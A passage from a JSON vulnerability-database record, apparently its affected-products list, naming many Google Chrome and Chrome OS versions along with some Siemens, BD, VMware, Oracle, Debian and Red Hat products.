"version": "7.0.505.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1063.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.286.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.723.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.134" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.725.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.224" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.672.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.358.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.151" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.754.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.107" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1007" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1659.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.783.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1047" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1052" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.78" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.51" }, { "model": "simatic ipc277e", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1690.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.308" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.820.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1044.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.109" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.343" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.432.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.731.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.249.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.560.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.819.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.324.0" }, { "model": "enterprise linux for power big endian extended update support", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1048" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "54.0.2840.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.125" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1032.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.162" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.433.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.117" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.201" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.612.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "38.0.2125.122" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.153" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.4.154.18" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.201" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1687.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.22" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.18" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.903.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.672.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.733.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.749.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.113" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.762.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.719.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.12" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.271.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.813.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.7" }, { "model": "assurity linc", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.237" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.36" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.53" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.211" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.622.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.673.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.1" }, { "model": "accuri c6 plus", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "simatic ipc477c", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1063.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.187" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1055.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.383.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.790.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.465.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.319" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.658.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "48.0.2564.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "51.0.2704.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1668.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.7" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.932.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.13" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.34" }, { "model": "pyxis infant care verification", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.41" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "49.0.2623.108" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1064.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.686.0" }, { "model": "pyxis supplystation", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1651.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1003.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.95" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.322.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.391.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.107" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.6" }, { "model": "identity manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1664.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.18" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.89" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "64.0.3282.167" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1031" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.18" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "58.0.3029.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1007.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.40" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.326.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.62" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.1.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1680.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.603.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.39" }, { "model": "sinema remote connect", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.686.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.213" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.32" }, { "model": "simatic field pg m5", "scope": "ne", "trust": 0.3, "vendor": "siemens", "version": "22.1.5" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1010" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.113" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.337" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.51" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.15" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.27" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.170" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.33" }, { "model": "simatic hmi comfort panels", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1051" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.119" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.896.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.152" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.417.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.218" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.334" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.657.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1049" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.331" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.667.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1057" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1673.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.689.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.152" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1288.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.390.0" }, { "model": "vsphere data protection", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1655.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.707.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1011.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1081.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.50" }, { "model": "fusion", "scope": "ne", "trust": 0.3, "vendor": "vmware", "version": "8.5.9" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1067.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.44" }, { "model": "communications lsms", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1664.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.801.0" }, { "model": "rowa smart", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1048.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.807.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.865.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1296.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.481.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.489.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "51.0.2704.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.69" }, { 